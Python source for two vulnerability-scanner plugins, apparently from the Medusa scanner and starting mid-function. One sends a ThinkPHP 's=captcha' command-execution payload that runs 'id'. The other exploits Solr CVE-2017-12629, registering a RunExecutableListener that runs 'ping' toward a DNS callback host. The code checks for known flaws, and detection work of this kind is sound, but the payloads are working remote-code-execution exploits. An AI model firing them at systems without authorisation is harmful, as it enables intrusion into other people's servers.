            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(exc, plugin_name)
        ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, exc)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Scanner plugin: one POST probe for the ThinkPHP ``s=captcha`` command execution issue.

    Args:
        Url: Target as handed to the scanner; split by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed through to ``VulnerabilityDetails`` on a hit.

    Returns:
        None. A hit is an HTTP 200 whose body contains ``uid=``, ``gid=``
        and ``groups=``; it is recorded through ``VulnerabilityDetails`` and
        ``WriteFile``. No proxy is used by this plugin. Exceptions go to
        ``ErrorHandling``/``ErrorLog``.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when the URL did not specify one.
    if port is None:
        port = 443 if scheme == 'https' else (80 if scheme == 'http' else None)
    try:
        payload_url = "{}://{}:{}{}".format(scheme, url, port, "/index.php?s=captcha")
        form_body = "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"
        request_headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        resp = requests.post(
            payload_url,
            headers=request_headers,
            data=form_body,
            timeout=6,
            verify=False,
        )
        body = resp.text
        id_output_seen = all(
            marker in body for marker in ("uid=", "gid=", "groups="))
        if resp.status_code == 200 and id_output_seen:
            Medusa = "{}存在ThinkPHP任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Store the finding with the target url and the scan timestamp.
            VulnerabilityDetails(finding.info, url, UnixTimestamp).Write()
            # url doubles as the output file name; Medusa is the recorded result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(exc, plugin_name)
        ErrorLog().Write(url, plugin_name)
def medusa(**kwargs)->None:
    """Scanner plugin: two-step out-of-band check for Solr RunExecutableListener (CVE-2017-12629).

    Keyword Args:
        Url: Base URL of the target; used verbatim (no ``UrlProcessing`` here).
        Headers: Request headers. NOTE: this dict is mutated in place below
            (``Headers2`` is an alias, not a copy), so the ``Accept`` and
            ``Content-Type`` values set for the second POST are also sent
            with the first POST and leak back to the caller.
        Proxies: Proxy specification passed straight to ``requests``.

    Returns:
        None. Step 1 lists cores via ``/solr/admin/cores`` and keeps the last
        key of ``status`` as the core name. Step 2 registers a listener via
        ``/config`` and triggers it via ``/update``; the probe then waits
        three seconds and treats a ``Dnslog`` callback as the hit, which is
        recorded through ``VulnerabilityDetails`` and ``WriteFile``.
        Exceptions go to ``ErrorHandling``/``ErrorLog``.
    """
    url=kwargs.get("Url")# target url supplied by the caller
    Headers=kwargs.get("Headers")# request headers supplied by the caller
    proxies=kwargs.get("Proxies")# proxy settings supplied by the caller
    try:

        payload_url=url +'/solr/admin/cores'
        # Step 1 is sent without verify=False, unlike the two POSTs below.
        step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            # Iterating the mapping yields keys; the last one wins.
            for x in data['status']:
                name = x
            payload = "/solr/"+name+"/config"
            payload2 = "/solr/" + name + "/update"
            payload_url = url + payload
            payload_url2 = url + payload2
            DL = Dnslog()  # out-of-band callback sink for the hit check
            rm=randoms().result(10)
            data1='''{"add-listener":{"event":"postCommit","name":"'''+rm+'''","class":"solr.RunExecutableListener","exe":"ping","dir":"/usr/bin/","args":["'''+DL.dns_host()+'''"]}}'''
            data2='''[{"id":"'''+rm+'''"}]'''
            # Alias, not a copy: the two assignments below also change Headers.
            Headers2 = Headers
            Headers2['Accept'] ='application/json'
            Headers2["Content-Type"]="application/json"
            # Author's note: the PoC is fine, the DNSlog side is unreliable.
            #DL="p61rpm.dnslog.cn"
            resp = requests.post(payload_url,data=data1,headers=Headers,proxies=proxies, timeout=6, verify=False)
            resp2 = requests.post(payload_url2, data=data2, headers=Headers2, proxies=proxies,timeout=6, verify=False)
            # Give the out-of-band callback time to arrive before polling.
            time.sleep(3)
            if DL.result():
                Medusa = "{}存在Solr远程代码执行漏洞(CVE-2017-12629)\r\n 验证数据:\r\n漏洞位置:{}\r\n模板返回值:{}\r\n执行结果:{}\r\n".format(url,payload_url,resp.text,resp2.text)
                _t = VulnerabilityInfo(Medusa)
                # NOTE(review): the second positional argument is the Response
                # object resp2, where sibling plugins pass url -- confirm intended.
                VulnerabilityDetails(_t.info, resp2,**kwargs).Write()  # store finding with caller context
                WriteFile().result(str(url),str(Medusa))# url doubles as the output file name; Medusa is the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# log plugin name, target and exception